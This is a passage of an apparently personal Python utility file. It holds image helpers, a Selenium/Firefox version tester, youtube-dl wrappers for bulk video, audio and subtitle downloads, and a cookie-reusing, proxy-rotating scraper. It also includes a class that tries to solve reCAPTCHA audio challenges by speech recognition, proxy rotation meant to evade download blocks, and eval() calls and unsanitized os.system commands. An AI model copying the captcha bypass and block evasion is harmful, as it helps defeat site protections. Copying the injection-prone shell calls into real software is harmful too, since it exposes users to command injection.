img_sharp = img.filter(ImageFilter.SHARPEN)
#img_sharp.show()
img_sharp.save(x)
return x
def contrast(self,x):
im = Image.open(x)
enhancer = ImageEnhance.Contrast(im)
enhanced_im = enhancer.enhance(1.2)
enhanced_im.save(x)
return x
def contrast_sharpen(self,x,sharpen=True,contrast=True):
im = Image.open(x)
img_contrast = ImageEnhance.Contrast(im)
if contrast:
im = img_contrast.enhance(1.05)
if sharpen:
im = im.convert("RGB")
im = im.filter(ImageFilter.SHARPEN)
im.save(x, optimize=True)
return x
def compress(self, fn):
from PIL import Image
if os.path.getsize(fn) > 153600:
img = Image.open(fn)
img = img.resize(img.size,Image.ANTIALIAS)
img.save(fn,optimize=True,quality=80)
return fn
class Selenium_Firefox_Matrix_Test:
def some_test_results(self):
if "geckodriver 18":
['quas.py', '3.4.3', '53']
['quas.py', '3.4.1', '57']
['quas.py', '3.4.3', '52']
['quas.py', '3.14.0', '52']
['quas.py', '3.6.0', '52']
['quas.py', '3.7.0', '52']
['quas.py', '3.4.1', '54']
['quas.py', '3.7.0', '53']
['quas.py', '3.6.0', '53']
['quas.py', '3.14.0', '53']
['quas.py', '3.14.0', '57']
['quas.py', '3.6.0', '57']
['quas.py', '3.7.0', '57']
['quas.py', '3.4.3', '54']
['quas.py', '3.14.0', '54']
['quas.py', '3.7.0', '54']
['quas.py', '3.6.0', '54']
['quas.py', '3.4.1', '53']
['quas.py', '3.4.1', '52']
['quas.py', '3.4.3', '57']
['quas.py', '3.13.0', '57']
['quas.py', '3.13.0', '54']
['quas.py', '3.12.0', '54']
['quas.py', '3.12.0', '52']
['quas.py', '3.13.0', '52']
['quas.py', '3.13.0', '53']
['quas.py', '3.12.0', '53']
['quas.py', '3.7.0', '60']
['quas.py', '3.6.0', '60']
['quas.py', '3.14.0', '60']
['quas.py', '3.10.0', '60']
['quas.py', '3.11.0', '60']
['quas.py', '3.9.0', '60']
['quas.py', '3.8.0', '60']
['quas.py', '3.4.0', '60']
['quas.py', '3.5.0', '60']
['quas.py', '3.14.1', '60']
['quas.py', '3.4.2', '60']
['quas.py', '3.12.0', '57']
if "geckodriver 19":
['quas.py', '3.4.3', '62']
['quas.py', '3.11.0', '61']
['quas.py', '3.10.0', '61']
['quas.py', '3.9.0', '62']
['quas.py', '3.8.0', '62']
['quas.py', '3.10.0', '62']
['quas.py', '3.11.0', '62']
['quas.py', '3.8.0', '61']
['quas.py', '3.9.0', '61']
['quas.py', '3.5.0', '61']
['quas.py', '3.4.0', '61']
['quas.py', '3.4.0', '62']
['quas.py', '3.5.0', '62']
['quas.py', '3.4.2', '62']
['quas.py', '3.14.1', '61']
['quas.py', '3.4.2', '61']
['quas.py', '3.14.1', '62']
def __init__(self):
exec("from soda.can import *", globals())
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver import ActionChains
from selenium import webdriver
from pyvirtualdisplay import Display
from selenium.webdriver.common.alert import Alert
from sys import platform
import selenium.webdriver.support.expected_conditions as EC
a = ["3.0.0",
"3.0.1",
"3.0.2",
"3.0.4",
"3.3.0",
"3.4.0",
"3.4.1",
"3.4.2",
"3.4.3",
"3.5.0",
"3.6.0",
"3.7.0",
"3.8.0",
"3.9.0",
"3.10.0",
"3.11.0",
"3.12.0",
"3.13.0",
"3.13.1",
"3.14.0",
"3.14.1"]
b = [
"/Applications/Firefox 61.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 62.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 63.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 64.app/Contents/MacOS/firefox-bin",
"/Applications/Firefox 46.app/Contents/MacOS/firefox-bin",
]
if __name__ == "__main__":
import sys
sys.argv[1]
print(sys.argv)
j = sys.argv[2]
j = ["/Applications/Firefox %s.app/Contents/MacOS/firefox-bin"%j for i in os.listdir("/Applications") if tryreturn(decimal_re, i) == int(j)][0]
print(j)
profile = "sele"
profile_path = os.path.expanduser("~/Library/Application Support/Firefox/Profiles")
executable_path = os.path.expanduser("~/tavern/tavern/soda/geckodriver 24")
firefox_profile = FirefoxProfile(homepath("~/Library/Application Support/Firefox/Profiles/%s" % (( [i for i in os.listdir(os.path.expanduser("~/Library/Application Support/Firefox/Profiles")) if profile == "".join(i.split(".")[1:]) ][0] ))))
firefox_binary = FirefoxBinary(j) # Make sure selenium is 3.8.0
wd = webdriver.Firefox(executable_path=executable_path, firefox_profile=firefox_profile, firefox_binary=firefox_binary)
# TESTER 1 #
for i in a:
for j in b:
F = subprocess.getoutput("pip install selenium==%s"%i)
greenprint(F)
if "Could not find a version that satisfies the requirement selenium" in F:
print("continue-")
continue
R = subprocess.getoutput("~/tavern/bin/python3.5 quas.py %s %s"%(i, decimal_re(j)))
redprint(R)
with open("%s_%s.txt" % (i, decimal_re(j)) , "w") as f:
f.write(R)
os.system("killall firefox-bin")
# TESTER 2 #
R = os.listdir()
for i in R:
try:
if "Traceback" not in open(i, "r").read():
print(i)
if "DEBUG" not in open(i).read():
distinct_print(open(i).read())
except Exception as e:
# redprint(e)
pass
class Slime(DecisionTree):
def __init__(self):
exec("from moviepy.editor import *")
from moviepy.editor import VideoFileClip
#from mutagen import MP3
from pydub import AudioSegment
from gtts import gTTS
globals().update(locals())
print("hello")
print(" -- most often, youtube_video_download(7) will be used -- ")
self.functions_sorted = [
"youtube_mp3_download",
"scdl",
"download",
"halfavideo",
"resizevideo",
"youtube_channel_download",
"youtube_playlist_download",
"youtube_artist_download",
"youtube_subtitle_download",
"youtube_proxy_download",
"splice",
"youtube_search_download",
"mass_videos_to_subtitles",
"download_a_song",
"download_en_masse",
"convert_current_directory_to_mp3",
"youtube_video_download",
"vaudioop",
"mp3_compile",
"mp3_to_mp4",
"mp4_to_mp3",
"mp3_to_wav",
"wav_to_mp3",
"wav_to_array",
"speak",
"speak2",
"save",
"get_sound_volume_output",
]
def resizevideo(self,infile,outfile):
os.system("ffmpeg -i '%s' -s 640x360 -c:a copy '%s' ;"%(infile,outfile))
def wav_to_array(self, infile):
from scipy.io.wavfile import read
a = read(infile)
return numpy.array(a[1],dtype=float)
def wav_to_mp3(self, infile, outfile):
os.system("ffmpeg -i '%s' -codec:a libmp3lame -qscale:a 2 '%s'"%(infile,outfile))
def mp3_to_wav(self, infile, outfile):
os.system("ffmpeg -i '%s' -acodec pcm_u8 -ar 22050 '%s'"%(infile,outfile))
def download_en_masse(self, data):
data = data.split(',')
url = data.pop(0)
outfile = data.pop(0)
isotimes = data
for isotime in isotimes:
start_isotime, end_isotime = isotime.split('-')
print("downloading %s %s-%s"%(url, start_isotime, end_isotime))
self.download(url, outfile, 'mp4', start_isotime, end_isotime)
def mass_videos_to_subtitles(self, word):
import os, requests
os.makedirs(word, exist_ok=True)
os.chdir(word)
many_urls = []
for i in range(30):
x = requests.get("https://www.youtube.com/results?search_query=%s&page=%s"%(word,i))
urls = re.findall(r'(?s)href="(/watch.*?)"', x.text)
urls = list(set(urls))
urls = ["https://youtube.com%s"%i for i in urls]
many_urls.extend(urls)
many_urls = list(set(many_urls))
print("found %s more urls, total of many_urls is %s" % (len(urls), len(many_urls)))
#os.system("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download https://www.youtube.com/results?search_query=%s&page=15"%(word.replace(" ","+")))
#os.system("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download https://www.youtube.com/results?q=%s&page=%s"%(word.replace(" ","+"), i))
#os.system("youtube-dl --ignore-errors --all-subs -f 18 -cit https://www.youtube.com/results?q=%s&page=%s"%(word, i))
for i in many_urls:
os.system("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download %s"%i)
def to_txt(fn):
with open(fn, "r") as f:
txt = f.read()
# <>s
pattern = r'(<.*?>)'
txt = re.sub(pattern, "", txt)
# timestamps
pattern = r'(.*-->.*)'
txt = re.sub(pattern, "", txt)
txt = txt.split("\n")
load = []
for i in txt:
i = i.strip()
load.append(i)
txt = "\n".join(load)
for i in range(20):
txt = txt.replace("\n\n", "\n")
txt = txt.split("\n")
load = []
# Only append if line is not duplicate.
for idx, i in enumerate(txt[:-1]):
try:
if txt[idx] != txt[idx+1]:
load.append(i)
except Exception as e:
print(e)
txt = "\n".join(load)
return txt
def lineskip(txt):
lineskips = [" but", " um", " I'm", " I"]
txt = txt.replace("\n", " ")
for i in lineskips:
txt = txt.replace(i, "\n%s"%i)
return txt
input("ready to change text on the downloaded srcs?")
for i in os.listdir():
if "vtt" not in i:
continue
print("working on file '%s'"%i)
txt = to_txt(i)
txt = lineskip(txt)
with open(i, "w") as f:
f.write(txt)
def youtube_mp3_download(self, url):
i = input("artist&track like this: '%s - %s' ||: ")
self.download(url, outfile=i, format="mp3")
artist_name, track_name = i.split(" - ")
track_name = track_name + ".mp3"
print('artist name: %s' % artist_name)
print('track name: %s' % track_name)
os.system('mv "%s.mp3" "%s"' % (i, track_name))
os.system('id3v2 -a "%s" "%s"' % (artist_name,track_name))
os.system('id3v2 -t "%s" "%s"' % (track_name,track_name))
print('\n')
os.system('id3v2 --list "%s"' % track_name)
os.system('mv "%s" ~/Documents/' % track_name)
def download_a_song(self, url, song, album, artist):
#https://www.youtube.com/watch?v=MW1mnujV6eI
song = song.replace("_", " ")
album = album.replace("_", " ")
artist = artist.replace("_", " ")
system("youtube-dl --extract-audio --audio-format mp3 %s" % url)
track_name = [i for i in os.listdir() if ".mp3" in i][0]
system('mv "%s" "%s"' % (track_name, "%s.mp3"%song))
system('id3v2 -a "%s" "%s"' % (artist, track_name))
system('id3v2 -A "%s" "%s"' % (album, track_name))
system('id3v2 -t "%s" "%s"' % (song, track_name))
system('mv *.mp3 ~/Documents/')
def download(self, url, outfile, format, start_isotime=None, end_isotime=None):
print("url, outfile, format='mp3', start_isotime=None, end_isotime=None");
if format == 'mp3':
system("youtube-dl --extract-audio --audio-format mp3 --output '{}.%(ext)s' {}".format(outfile.replace('.mp3',''), url))
fn = '%s.mp3' % outfile
while fn not in os.listdir('.'):
time.sleep(1)
print("Waiting...")
if start_isotime:
sliced_fn = ('%s-%s-%s'%(start_isotime, end_isotime, fn)).replace(':', '')
sliced = self.splice(fn, start_isotime, end_isotime, 'mp3')
sliced.export(sliced_fn)
system('rm %s'%fn)
return sliced_fn
return fn
elif format == 'mp4':
system("youtube-dl -f 18 --output '{}.%(ext)s' {}".format(outfile.replace('.mp4',''), url))
time.sleep(5)
fn = '%s.mp4' % outfile
while fn not in os.listdir('.'):
time.sleep(1)
print("Waiting...")
if start_isotime:
print("splicing...")
sliced = self.splice(fn, start_isotime, end_isotime, format='mp4')
system('rm %s'%fn)
def splice(self, fn, start_isotime, end_isotime, format):
if format == 'mp3':
sound = AudioSegment.from_mp3(fn)
start = self.isotime_to_milliseconds(start_isotime)
end = self.isotime_to_milliseconds(end_isotime)
spliced_sound = sound[start:end]
spliced_sound.export("%s-%s_%s"%(start_isotime,end_isotime,fn.split('/')[-1]))
return spliced_sound
elif format == 'mp4':
video = VideoFileClip(fn)
start = self.isotime_to_seconds(start_isotime)
end = self.isotime_to_seconds(end_isotime)
video = video.subclip(start, end)
sliced_fn = ('%s-%s-%s'%(start_isotime, end_isotime, fn)).replace(':', '')
print('sliced_fn: %s'%sliced_fn)
video.write_videofile(sliced_fn, fps=24)
return video
def youtube_search_download(self, query):
query = query.replace('_','+')
system("youtube-dl --ignore-errors -f 18 -cit https://www.youtube.com/results?q=%s&page=1"%query)
def youtube_channel_download(self, url, format, bestquality="False", proxy="False"):
proxy = eval(proxy)
bestquality = eval(bestquality)
print("please specify a format, mp4/m4a, or mp3 || note in future will have need cvrt webm to m4a.. ")
x = requests.get(url).text
folder_name = or_list(lambda:SOUPY(x,"h2","class","epic-nav-item-heading")[0].text.strip(),SOUPY(x,"span","class","qualified-channel-title-text")[0].text)
print("downloading to ~/Documents/%s" % folder_name)
if format == "mp3":
###
if proxy == False:
system('mkdir "/Users/$USER/Documents/%s" && cd "/Users/$USER/Documents/%s" && youtube-dl --extract-audio --audio-format mp3 --ignore-errors %s &' % (folder_name,folder_name,url))
###
###
elif proxy == True:
proxy_list = get_us_ip_list() # stored in general-utils
for idx, proxy in enumerate(proxy_list):
print("#%s" % idx)
#response = getoutput("youtube-dl --proxy %s %s" % (proxy, url))
response = getoutput('mkdir "/Users/$USER/Documents/%s" && cd "/Users/$USER/Documents/%s" && youtube-dl --extract-audio --audio-format mp3 --ignore-errors --proxy %s "%s" & '%(folder_name,folder_name,proxy,url))
print(response)
if "[download] Destination:" in response:
print("found it -- proxy 1")
###
elif format == "m4a" or format == "mp4":
if proxy == False:
if bestquality == False:
system('mkdir "/Users/$USER/Documents/%s" ; cd "/Users/$USER/Documents/%s" && youtube-dl --ignore-errors -f 18 "%s" '%(folder_name,folder_name,url))
elif bestquality == True:
bestqualitie = self.get_best_qualitie(url)
print("bestqualitie: %s" % bestqualitie)
system('mkdir "/Users/$USER/Documents/%s" ; cd "/Users/$USER/Documents/%s" && youtube-dl --ignore-errors -f %s "%s" '%(folder_name,folder_name, bestqualitie, url))
elif proxy == True:
proxy_list = get_us_ip_list() # stored in general-utils
random.shuffle(proxy_list)
for idx, proxy in enumerate(proxy_list):
print("#%s" % idx)
#response = getoutput("youtube-dl --proxy %s %s" % (proxy, url))
response = getoutput('mkdir "/Users/$USER/Documents/%s" ; cd "/Users/$USER/Documents/%s" && youtube-dl --ignore-errors --proxy %s "%s" '%(folder_name,folder_name,proxy,url))
print(response)
if "[download] Destination:" in response:
print("found it -- proxy 1")
try:
if format == "mp3":
for i in os.listdir(homepath("~/Documents/%s" % folder_name)):
system('id3v2 -a "%s" "/Users/$USER/Documents/%s/%s"' % (folder_name,folder_name,i))
system('id3v2 -t "%s" "/Users/$USER/Documents/%s/%s"' % (i,folder_name,i))
except:
# untested
pass
def get_best_qualitie(self, url):
q = getoutput("youtube-dl -F '%s'"% url)
qualities = {}
for i in q.split("\n"):
if " mp4 " in i:
note=re.findall(r" ([0-9]+p)", i)
format_=re.findall(r"(^[0-9]+) ", i)
if note != []:
qualities[format_[0]] = int(note[0].replace("p",""))
bestqualitie = -1
for format_ in qualities:
if qualities[format_] > bestqualitie:
bestqualitie = qualities[format_]
return bestqualitie
def get_sound_volume_output(self, seconds=10):
import sounddevice as sd
import numpy as np
def print_sound(indata,outdata,frames,time,status):
volume_norm = np.linalg.norm(indata)*10
print("|" * int(volume_norm))
with sd.Stream(callback=print_sound):
sd.sleep(seconds * 1000)
def youtube_playlist_download(self, url, format="mp3", folder_name = None):
print("please specify a format, mp4/m4a, or mp3 || note in future will have need cvrt webm to m4a.. ")
folder_name = url.split("/")[-1] if folder_name == None else folder_name
print("downloading to ~/Documents/%s" % folder_name)
if format == "mp3":
system("mkdir ~/Documents/%s ; cd ~/Documents/%s && youtube-dl --extract-audio --audio-format mp3 --ignore-errors %s &" % (folder_name,folder_name,url))
elif format == "m4a" or format == "mp4":
system('mkdir ~/Documents/%s ; cd ~/Documents/%s && youtube-dl --ignore-errors -f 18 "%s" &'%(folder_name,folder_name,url))
def youtube_artist_download(self):
artist = OSA.log("artist?:")
playlist_urls = []
while True:
x = str(pyperclip.paste()).split("&playnext")[0]
if "playlist" in x and x not in playlist_urls:
playlist_urls.append(x)
if x == "end":
break
os.makedirs(homepath("~/Documents/%s"%(artist)),exist_ok=True)
for i in playlist_urls:
title = SOUP(requests.get(i).text).findAll("h1",attrs={"class":"pl-header-title"})[0].text.strip()
y = homepath("~/Documents/%s/%s"%(artist,title))
os.makedirs(y,exist_ok=True)
os.chdir(y)
os.system("youtube-dl --extract-audio --audio-format mp3 --ignore-errors %s"%(i))
os.system("id3v2 -a '%s' *"%(artist))
os.system("id3v2 -A '%s' *"%(title))
# def youtube_artist_download(self):
# artists = OSA.log("artists (delimited by ', ')?:")
# ss = Browser()("ch")
# for artist in artists:
# ss.get("https://www.youtube.com/results?search_query=%s"%(artist))
# ss.fcns("ytd-search-refinement-card-renderer")
def convert_current_directory_to_mp3(self):
for fn in os.listdir():
if '.mp4' == fn[-4:]:
self.mp4_to_mp3(fn, fn.replace('.mp4','.mp3'))
os.remove(fn)
def youtube_video_download(self, url):
system('youtube-dl -f 18 -citw -v %s'%url)
def isotime_to_milliseconds(self, isotime):
minutes, seconds = isotime.split(':')
milliseconds = 1000 * ((int(minutes)*60)+int(seconds))
return milliseconds
def isotime_to_seconds(self, isotime):
minutes, seconds_ = isotime.split(':')
seconds = ((int(minutes)*60)+int(seconds_))
return seconds
def milliseconds_to_isotime(self, milliseconds):
seconds = int((milliseconds/1000)%60)
minutes = int(((milliseconds/1000)-seconds)/60)
return '%s:%s' % (minutes, seconds)
def vaudioop(self, audio_file_name, video_file_name, output_file_name):
audio = (AudioFileClip(audio_file_name))
clip = (VideoFileClip(video_file_name, audio=False))
edited_video = (clip.fx(vfx.loop, duration=audio.duration))
final = (edited_video.set_audio(audio))
final.write_videofile(output_file_name, fps=clip.fps,
audio_bitrate="1000k", bitrate="4000k")
# [ FINAL ]
def mp3_compile(self, crossfade=2):
print("this will compile the mp3 files in this directory... crossfade inputtable")
out_fn = input("output mp3 filename?: ")
payload = AudioSegment.from_mp3('silence')
for idx, i in enumerate(os.listdir('.')):
print('%s. %s'%(idx, i))
numbers = input("Numbers delimited by ', '?: ")
numbers = list(map(int, numbers.split(', ')))
tracktimes = []
for i in numbers:
filename = os.listdir('.')[i]
payload += AudioSegment.from_mp3(filename)
tracktimes.append("%s : %s" % (filename, self.milliseconds_to_isotime(len(payload))))
payload += AudioSegment.from_mp3('silence') * crossfade
print('\n'.join(tracktimes))
payload.export(out_fn)
@timeit
def mp3_to_mp4(self, picture, mp3, out='final.mp4'):
Images().resize(picture, 1920)
system("ffmpeg -loop 1 -i %s -i %s -c:v libx264 -c:a aac -strict experimental -b:a 192k -shortest -preset ultrafast %s" % (picture,mp3,out))
def mp4_to_mp3(self, fn, outfile):
clip = VideoFileClip(fn) # .subclip(0,20)
clip.audio.write_audiofile(outfile)
def scdl(self, artist, link):
from mutagen.mp3 import MP3
os.makedirs(homepath("~/Documents/%s"%(artist)))
os.chdir(homepath("~/Documents/%s"%(artist)))
os.system("scdl --onlymp3 -c -t -l %s"%(link))
os.system('id3v2 -a """%s""" *'%(artist))
for i in os.listdir():
audio = MP3(i)
if audio.info.length < 45:
print("%s less than 45 seconds in runtime, it is %s. deleting..." % (i, audio.info.length))
os.remove(i)
def halfavideo(self, count=8, fn="Test.mp4"):
print("inputs are count, fn ")
command = "ffmpeg -i %s -filter:a '%s' -vn %s_slower_%s" \
% (fn, ("atempo=0.5 "*count).strip().replace(" ", ","), count, fn)
print(command)
print("%s Times Slower" % 0.5**count)
import os
os.system(command)
def youtube_proxy_download(self, url):
# ip_regex = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
proxy_list = get_us_ip_list() # stored in general-utils
for idx, proxy in enumerate(proxy_list):
print("#%s" % idx)
#response = getoutput("youtube-dl --proxy %s %s" % (proxy, url))
response = getoutput("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --proxy %s %s" % (proxy, url))
print(response)
if "[download] Destination:" in response:
print("found it -- proxy 1")
return response
def youtube_subtitle_download(self, url):
print("youtube subtitle downloading url: %s" % url)
def dl(url):
x = getoutput("youtube-dl --sub-lang en --sub-format vtt --write-auto-sub --skip-download %s" % url)
x = x.split(": ")[-1]
getoutput("mv '%s' '%s'" % (x, x.replace(" ", "_")))
return x.replace(" ", "_")
def to_txt(fn):
with open(fn, "r") as f:
txt = f.read()
# <>s
pattern = r'(<.*?>)'
txt = re.sub(pattern, "", txt)
# timestamps
pattern = r'(.*-->.*)'
txt = re.sub(pattern, "", txt)
txt = txt.split("\n")
load = []
for i in txt:
i = i.strip()
load.append(i)
txt = "\n".join(load)
for i in range(20):
txt = txt.replace("\n\n", "\n")
txt = txt.split("\n")
load = []
# Only append if line is not duplicate.
for idx, i in enumerate(txt[:-1]):
try:
if txt[idx] != txt[idx+1]:
load.append(i)
except Exception as e:
print(e)
txt = "\n".join(load)
return txt
def lineskip(txt):
lineskips = [" but", " um", " I'm", " I"]
txt = txt.replace("\n", " ")
for i in lineskips:
txt = txt.replace(i, "\n%s"%i)
return txt
def main(url):
fn = dl(url)
txt = to_txt(fn)
txt = lineskip(txt)
with open("%s.txt"%fn, "w") as f:
f.write(txt)
main(url)
print("success")
def speak(self, text = None, lang="en", slow=False):
if text == None: text = multi_input("Input text to speak: ").replace("\n", ". ")
tts = gTTS(text, lang=lang, slow=slow)
tts.save("out.mp3")
os.system("afplay out.mp3 && rm out.mp3 &")
def speak2(self, text = None):
if text == None: text = multi_input("Input text to speak: ").replace("\n", ". ")
os.system('say """%s""" &' % text)
def save(self, text, output, lang="en", slow=False):
text = multi_input("Input text to speak: ").replace("\n", ". ") if text==None else text
tts = gTTS(text, lang=lang, slow=slow)
tts.save(output)
def translate(self, to_translate, to_language="en", from_language="auto"):
from mtranslate import translate
return translate(to_translate, to_language, from_language)
def add_videos(self, files, destination):
files = lmap(lambda i:("'%s'"%(i)), files)
os.system("mencoder -forceidx -ovc copy -oac pcm -o '%s' %s"%(destination, Join(" ",files)))
def get_albums_from_wikipedia(self,url="https://en.wikipedia.org/wiki/1969_in_music"):
""" url = "https://en.wikipedia.org/wiki/1969_in_music" """
a = read_html(url)
a = [i for i in a if "Album" in str(i)]
redprint(len(a))
a = sum(a,[])
redprint(len(a))
return a
def audio_record(self):
# Other aliases: record_wav, record_sound, record_self, record_audio, mp3_record, wav_record
address = greeninput("address?: ")
( [redprint("address in os.listdir()"),0/0] ) if(0!=os.listdir().count(address)) else( [redprint("address `%s` not in os.listdir()"%address)] )
OSA(None, ["cmd_arrow_right"]) # shift aside desktop windows.
os.system("""/usr/local/bin/sox -d "%s" """ % (address))
def tests(self):
test_url = 'https://www.youtube.com/watch?v=PN7HJBodm8o'
self.download(test_url, outfile='test_download', format='mp3')
print('test done')
self.download(test_url, outfile='test_download2', format='mp3', start_isotime='00:10', end_isotime='1:10')
print('test done')
self.download(test_url, outfile='test_download3', format='mp4')
print('test done')
self.download(test_url, outfile='test_download4', format='mp4', start_isotime='00:10', end_isotime='1:10')
print('test done')
self.mp4_to_mp3(input('mp4_to_mp3?:'), input("outfile?: "))
self.mp3_compile()
def check_domain_name_via_shopify(domain):
if(0!=len(re.findall(r"\d+",domain))):
OSA.display_dialog("Numbers are not support in domain in this project. Please try again.", text_prompt = False, buttons=["OK"])
return
zo = "https://www.shopify.com/tools/domain-name-generator/search?utf8=%E2%9C%93&query={}&button=&tool=domain_name_generator"
po = zo.format(domain)
vo = requests.get(po).text
zox = re.findall(r"""polling_exact_id.*?value="(.*)" """,vo)
if len(zox) == 0:
OSA.display_dialog("domain %s is not available.", text_prompt = False, buttons=["OK"])
else:
zox = zox[0]
idv = 0
bung = []
while True:
idv += 1
kooks = ""
def run():
blech = "https://www.shopify.com/tools/domain-name-generator/poll?pollingID={}&page={}".format(zox, idv)
kooks = requests.get(blech).text
distinct_print(kooks)
if kooks == '{"results":"-PENDING-"}':
print("something as -pending-")
return run()
else:
return kooks
kooks = run()
if """{"results":[]}""" == kooks:
break
else:
bung.append(kooks)
bang = pool(lambda x: json.loads(x)["results"], bung).result()
try:beng = sum(bang, [])
except:print(bang[0])
nos = pool(lambda x: AttrDict(x), beng).result()
keycall("__delitem__", nos, "shop_name")
if not keyequals("domain_name", domain, nos):
dialog = "domain %s is not available or already purchased.\nIf it is owned by you, please continue normally.\nHere are your other options:\n%s"%(domain, "\n".join(["%s is %s at $%s per year"%(i.domain_name, ("Available")if(True==i.available)else("not available"), i.price) for i in nos]))
if False == keyequals("domain_name", domain, nos)[0].available:
dialog = "domainc %s is not available or already purchased.\nIf it is owned by you, please continue normally.\nHere are your other options:\n%s"%(domain, "\n".join(["%s is %s at $%s per year"%(i.domain_name, ("Available")if(True==i.available)else("not available"), i.price) for i in nos]))
if True == keyequals("domain_name", domain, nos)[0].available:
dialog = "domain %s is available at $%s per year" % (domain, keyequals("domain_name", domain, nos)[0].price)
OSA.display_dialog(dialog, text_prompt = False, buttons = ["OK"])
class My_Requests:
process_ = False
help = lambda self: redprint(""" def request(self,process_count=4,timeout=10,notInUrl="ø",notInText="ø",proxy=True): """)
requesting = lambda self: process(lambda: [self.request(no_return=True),self.requesting()if(0!=len(Filter(Request,x=False)))else([-1,redprint("Empty")])])
def request(self,process_count=10,timeout=10,notInUrl="ø",notInText="ø",proxy=True,url=None,helper_count = 500,no_return = False):
#url = "https://google.com"
#timeout=10
#notInUrl="ø"
#notInText="ø"
not_requested = Filter_Get_Randoms(Request,x=False,count=helper_count)if(None==url)else( [setitem(globals(),"url_specified_request",Create(Request,w=url)),Filter(Request,id=globals()["url_specified_request"].id)][1] )
not_requested = list(not_requested)
__special_metric__ = len(not_requested) + 1
for idx_z, i in enumerate(range(helper_count)):
__special_metric__ = __special_metric__ - 1
redprint("__special_metric__: %s, idx_z: %s" % (__special_metric__,idx_z))
if __special_metric__ == 0:
return "None"
self.new = not_requested.pop(0)
magentaprint("self.new: %s" % self.new)
if self.new.notInText: notInText = self.new.notInText
if self.new.notInUrl: notInUrl = self.new.notInUrl
if not self.new.cookies_label:
a = requests.get(self.new.w)
distinct_print(a.status_code)
""" ::: hnsr y ts in hr. tk out. amazon_add gv me EROR. ::: """ # ({[({[[[\\Took\\it\\out\\and\\it\\was\\fine.]]]]]}})})
""" ::: Upon inspection, the ABOVE THING, i said, well. if amazon in url, and a's status_code was 503... LOL. ::: """
if((self.new.w.find("amazon")>-1)and(503==a.status_code)): return self.request(process_count=process_count,timeout=timeout,notInUrl=notInUrl,notInText=notInText,proxy=proxy,url=None,helper_count=helper_count,no_return=no_return)
if (0!=a) and (-1!=getattr(a,"status_code",-1)) and (notInUrl not in getattr(a,"url",notInUrl)) and (notInText not in getattr(a,"text",notInText)):
if no_return == True:
Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
continue
else:
""" ::: Not sure why I took this out. ::: """
#1
return Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
print("here")
#magentaprint(self.new.y)
""" """
s = None
if self.new.cookies_label:
s = requests.Session()
s.headers = session_headers
cookies = None
cookies = cookies_to_database(username=self.new.cookies_label.split("|")[0],website_name=self.new.cookies_label.split("|")[1],reverse=True)
s = cookies_to_session(cookies, s)
a = s.get(self.new.w)
redprint("[%s][%s]"% (a.status_code, self.new.w))
if (0!=a) and (-1!=getattr(a,"status_code",-1)) and (notInUrl not in getattr(a,"url",notInUrl)) and (notInText not in getattr(a,"text",notInText)):
redprint("[ensuring] `%s` not in `a.text`: %s" % (notInText, notInText not in a.text))
redprint("[ensuring] `%s` not in `a.url`: %s" % (notInUrl, notInUrl not in a.text))
if no_return == True:
Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
continue
else:
return Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
else:
redprint("[ensuring] `%s` in `a.text`: %s" % (notInText, notInText in a.text))
redprint("[ensuring] `%s` in `a.url`: %s" % (notInUrl, notInUrl in a.text))
""" if self.new.cookies_label, you're not gonna get it without the cookies, ie you must continue at the end of this if statement """
continue
""" """
magentaprint("[url][%s]" % self.new.w)
proxies = Proxy().get_random_proxy()if(1==proxy)else(None)
processes = []
for i in range(process_count):
def run_once():
if Get(Request,id=self.new.id).y == None:
magentaprint(Get(Request,id=self.new.id).y)
#a = tryreturn(requests.get,self.new.w,timeout=10,headers=session_headers,proxies=proxies,ep=True)
#a = tryreturn(requests.get,self.new.w,timeout=10,headers=session_headers,proxies=proxies,ep=True)
a = None
try:
if "amazon" in self.new.w:
a = requests.get(self.new.w,timeout=10,proxies=proxies,headers=amazon_headers)
else:
a = requests.get(self.new.w,timeout=10,proxies=proxies,headers=session_headers)
except Exception as e:
redprint(e)
time.sleep(10)
print(a)
print(a)
print("going")
if (0!=a) and (-1!=getattr(a,"status_code",-1)) and (notInUrl not in getattr(a,"url",notInUrl)) and (notInText not in getattr(a,"text",notInText)):
if Get(Request,id=self.new.id).y != None:
if no_return == True:
Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
else:
return Update(self.new,y=a.text,x=True,time_added=datetime.now()).y
else:
return run_once()
print("appending process")
processes.append(process_(run_once)if(1==self.process_)else(process(run_once)))
while True:
time.sleep(1/4)
if Get(Request,id=self.new.id).y != None:
magentaprint(Get(Request,id=self.new.id).y)
if self.process_ == True: keycall("terminate",processes)
return Get(Request,id=self.new.id).y
""" if notInUrl set to partial correct url, it will request x/second And Likely 443. """
class Recaptcha:
def __init__(self):
# Attempt No.1
# Attempt No.1
# Attempt No.1
# Attempt No.1
# Attempt No.1
# Attempt No.1
os.system("brew install pocketsphinx")
os.system("brew install ffmpeg")
os.system("pip install moviepy")
os.system("pip install gtts")
OSA.display_dialog("Download the audio from the recaptcha.", text_prompt = False)
os.remove("audio.mp3")
os.remove("audio.wav")
os.system("mv ~/Downloads/audio.mp3 audio.mp3")
Slime().mp3_to_wav("audio.mp3", "audio.wav")
a = Speech_Recognition().recognize_sphinx("audio.wav")
b = Speech_Recognition().recognize_google("audio.wav")
c = Speech_Recognition().recognize_google_cloud("audio.wav")
print(a, b, c)
""" Business-Utils-Product-Utils """
def adjustvariantname(x):
x = x.title()
x = re_found_function(x,"(?i)X{6}l",lambda i:re_substitute(i,["(?i)X{6}l","6XL"]))
x = re_found_function(x,"(?i)X{5}l",lambda i:re_substitute(i,["(?i)X{5}l","5XL"]))
x = re_found_function(x,"(?i)X{4}l",lambda i:re_substitute(i,["(?i)X{4}l","4XL"]))
